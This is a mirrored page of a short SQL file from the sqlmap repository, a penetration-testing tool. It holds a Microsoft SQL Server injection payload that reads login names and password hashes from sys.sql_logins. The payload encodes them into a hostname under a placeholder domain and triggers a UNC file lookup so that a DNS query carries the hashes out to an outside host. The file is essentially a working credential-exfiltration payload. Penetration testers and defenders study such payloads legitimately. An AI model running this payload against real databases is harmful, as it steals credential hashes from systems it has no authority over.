mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-12-02 14:33:51 +03:00
5 lines
303 B
Plaintext
5 lines
303 B
Plaintext
# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
|
|
|
|
DECLARE @host varchar(1024);
|
|
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
|
|
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); |